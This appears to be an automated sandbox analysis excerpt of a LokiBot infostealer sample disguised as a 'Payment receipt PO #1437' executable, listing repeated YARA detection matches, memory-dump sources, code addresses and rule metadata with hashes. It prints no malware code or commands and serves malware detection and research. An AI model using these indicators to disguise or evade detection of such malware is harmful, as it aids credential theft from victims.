Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: euKeoTytdT.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: euKeoTytdT.exe PID: 7596, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06D9618C	1_2_06D9618C
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06D973A8	1_2_06D973A8
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06D96183	1_2_06D96183
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E75AF8	1_2_06E75AF8
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7A768	1_2_06E7A768
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7A758	1_2_06E7A758
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E78720	1_2_06E78720
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7A330	1_2_06E7A330
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7B040	1_2_06E7B040
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7B032	1_2_06E7B032
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E78B58	1_2_06E78B58
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0725618C	11_2_0725618C
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_072573A8	11_2_072573A8
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0725617D	11_2_0725617D
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07335AF8	11_2_07335AF8
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733A768	11_2_0733A768
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733A758	11_2_0733A758
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07336561	11_2_07336561
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07335432	11_2_07335432
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733A330	11_2_0733A330
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733B032	11_2_0733B032
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733B040	11_2_0733B040
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07333F53	11_2_07333F53
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07338C88	11_2_07338C88
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07338850	11_2_07338850
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 17_2_0040549C	17_2_0040549C
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 17_2_004029D4	17_2_004029D4

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: String function: 00405B6F appears 42 times

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2224379201.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2233065463.0000000006D70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2229898655.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2228686790.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000000.2165252104.00000000004C8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejnXT.exe" vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2233575603.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Binary or memory string: OriginalFilenamejnXT.exe" vs Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
